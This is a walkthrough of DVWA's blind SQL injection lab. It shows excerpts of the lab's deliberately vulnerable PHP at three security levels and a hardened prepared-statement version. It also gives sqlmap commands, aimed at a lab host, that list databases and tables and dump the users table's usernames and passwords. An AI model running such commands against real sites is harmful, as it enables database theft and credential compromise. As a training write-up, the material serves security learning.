DVWA walkthrough (SQL Injection (Blind))

SQL Injection (Blind), i.e. blind SQL injection, differs from ordinary injection in the following way: with ordinary injection the attacker can read the result of the injected statement directly from the page, whereas with blind injection the attacker usually cannot obtain the execution result from the displayed page and may not even know whether the injected statement was executed at all, so blind injection is harder than ordinary injection. Most of the SQL injection vulnerabilities currently found on the web are blind SQL injection.

LOW

Core code


SQL Injection (Blind) Source
vulnerabilities/sqli_blind/source/low.php
 0);
                } catch(Exception $e) {
                    $exists = false;
                }
            }
            ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
            break;
        case SQLITE:
            global $sqlite_db_connection;

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            try {
                $results = $sqlite_db_connection->query($query);
                $row = $results->fetchArray();
                $exists = $row !== false;
            } catch(Exception $e) {
                $exists = false;
            }

            break;
    }

    if ($exists) {
        // Feedback for end user
        echo 'User ID exists in the database.';
    } else {
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo 'User ID is MISSING from the database.';
    }
}
?>
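As an added example (not DVWA's own code), here is a hardened replacement for the lookup in low.php: the id is validated as an integer and then bound to a prepared statement, so the page can still answer "exists" or "missing" but the query structure can no longer be altered by the input. It assumes $conn is an open mysqli connection and that user_id is a positive integer column.

```php
<?php
// Added example, not part of DVWA: hardened form of the user_id lookup.
// Assumes $conn is an open mysqli connection (DVWA keeps its own in
// $GLOBALS["___mysqli_ston"]; the name here is a stand-in).
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // make prepare()/execute() failures throw

function user_exists(mysqli $conn, string $rawId): ?bool
{
    // user_id is numeric, so reject anything that is not a plain positive integer
    // before it reaches the database. Inputs such as "1 AND 1=1" or "1' OR '1'='1"
    // fail validation here and never become part of a query.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // caller treats this as a bad request, not as "user missing"
    }

    // Prepared statement: the value travels separately from the SQL text, so even
    // if the validation above were removed it could not change the query structure.
    // This is the fix; the random sleep added in high.php only adds timing noise.
    $stmt = $conn->prepare('SELECT 1 FROM users WHERE user_id = ? LIMIT 1');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->store_result();
    $exists = $stmt->num_rows > 0;
    $stmt->close();
    return $exists;
}

$result = user_exists($conn, $_GET['id'] ?? '');
if ($result === null) {
    header($_SERVER['SERVER_PROTOCOL'] . ' 400 Bad Request');
    echo 'Invalid user ID.';
} elseif ($result) {
    echo 'User ID exists in the database.';
} else {
    header($_SERVER['SERVER_PROTOCOL'] . ' 404 Not Found');
    echo 'User ID is MISSING from the database.';
}
```

The exists/missing response itself is legitimate application behaviour; once the query is parameterized, the 404 only answers the question the page is meant to answer, and an attacker can no longer turn it into an oracle for other data.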

Here, the sqlmap tool on Linux is used directly to perform the SQL injection.

(1) Command to list the name of the current database

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --current-db

The values marked in red vary from host to host. The database name returned is: dvwa

[screenshot 1]

(2) Command to list the table names

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" -D dvwa --tables

There are two tables, guestbook and users.

[screenshot 2]

(3) Retrieve the data in the users table

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" -D dvwa -T users --dump --batch

[screenshot 3]

Medium


SQL Injection Source
vulnerabilities/sqli/source/medium.php
' . mysqli_error($GLOBALS["___mysqli_ston"]) . '
' );

            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
                // Display values
                $first = $row["first_name"];
                $last  = $row["last_name"];
                // Feedback for end user
                echo "ID: {$id}\nFirst name: {$first}\nSurname: {$last}\n";
            }
            break;
        case SQLITE:
            global $sqlite_db_connection;
            $query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
            #print $query;
            try {
                $results = $sqlite_db_connection->query($query);
            } catch (Exception $e) {
                echo 'Caught exception: ' . $e->getMessage();
                exit();
            }
            if ($results) {
                while ($row = $results->fetchArray()) {
                    // Get values
                    $first = $row["first_name"];
                    $last  = $row["last_name"];
                    // Feedback for end user
                    echo "ID: {$id}\nFirst name: {$first}\nSurname: {$last}\n";
                }
            } else {
                echo "Error in fetch ".$sqlite_db->lastErrorMsg();
            }
            break;
    }
}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '
' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '
' );
$number_of_rows = mysqli_fetch_row( $result )[0];
mysqli_close($GLOBALS["___mysqli_ston"]);
?>

Looking at the PHP code, the request method has changed from GET to POST.

(1) Since the request method changed from GET to POST, the --data option must be added

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie "security=medium; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --data="id=1&Submit=Submit"

[screenshot 4]

(2) List the databases

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie "security=medium; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --data="id=1&Submit=Submit" --dbs

[screenshot 5]

(3) Dump the table names

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie "security=medium; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --data="id=1&Submit=Submit" -D dvwa --tables

[screenshot 6]

(4) List the columns of the users table

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie "security=medium; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --data="id=1&Submit=Submit" -D dvwa -T users --columns

[screenshot 7]

(5) Dump the actual contents and decrypt them

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie "security=medium; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --data="id=1&Submit=Submit" -D dvwa -T users -C user,password --dump

[screenshot 8]

HIGH


SQL Injection (Blind) Source
vulnerabilities/sqli_blind/source/high.php
 0); // The '@' character suppresses errors
                } catch(Exception $e) {
                    $exists = false;
                }
            }

            ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
            break;
        case SQLITE:
            global $sqlite_db_connection;

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
            try {
                $results = $sqlite_db_connection->query($query);
                $row = $results->fetchArray();
                $exists = $row !== false;
            } catch(Exception $e) {
                $exists = false;
            }

            break;
    }

    if ($exists) {
        // Feedback for end user
        echo 'User ID exists in the database.';
    } else {
        // Might sleep a random amount
        if( rand( 0, 5 ) == 3 ) {
            sleep( rand( 2, 4 ) );
        }
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
        // Feedback for end user
        echo 'User ID is MISSING from the database.';
    }
}
?>

Compared with the previous two levels, the id value is passed via a cookie here, and a sleep has been added, which increases the time cost of blind injection.

(1)

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/cookie-input.php#" --data="id=1&Submit=Submit" --second-url="http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie="id=1;security=high; PHPSESSID=t8drnkrisfem4s5eqej702mmt1"

[screenshot 9]

(2) List the databases

sqlmap -u "http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/cookie-input.php#" --data="id=1&Submit=Submit" --second-url="http://192.168.40.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie="id=1;security=high; PHPSESSID=t8drnkrisfem4s5eqej702mmt1" --dbs

[screenshot 10]

The remaining steps are the same as for the previous two levels: append the required options to the command.
